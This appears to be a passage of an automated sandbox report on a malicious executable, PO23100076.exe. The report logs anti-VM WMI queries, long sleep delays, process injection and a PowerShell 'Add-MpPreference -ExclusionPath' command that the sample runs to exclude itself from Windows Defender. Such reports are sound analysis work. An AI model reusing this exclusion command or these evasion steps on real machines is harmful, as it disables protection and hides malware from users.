Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO23100076.exe PID: 5392, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\PO23100076.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 23D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 7050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 8050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 81F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 91F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 2A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8033	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1334	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Window / User API: threadDelayed 2867	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Window / User API: threadDelayed 4695	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe TID: 3624	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 7116	Thread sleep count: 2867 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -23980767295822402s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99857s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99676s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -99011s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 7116	Thread sleep count: 4695 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98779s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98118s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97340s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97232s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97121s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -97011s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -96015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -95906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -95796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe TID: 4452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\PO23100076.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PO23100076.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99857	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99676	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99358	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99249	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 99011	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98779	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98452	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98118	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97890	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97671	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97340	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97232	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97121	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 97011	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96890	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96671	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96562	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96453	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96343	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96234	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96124	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 96015	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 95906	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 95796	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: PO23100076.exe, 00000008.00000002.2487640721.0000000000C71000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO23100076.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO23100076.exe

Memory written: C:\Users\user\Desktop\PO23100076.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Users\user\Desktop\PO23100076.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
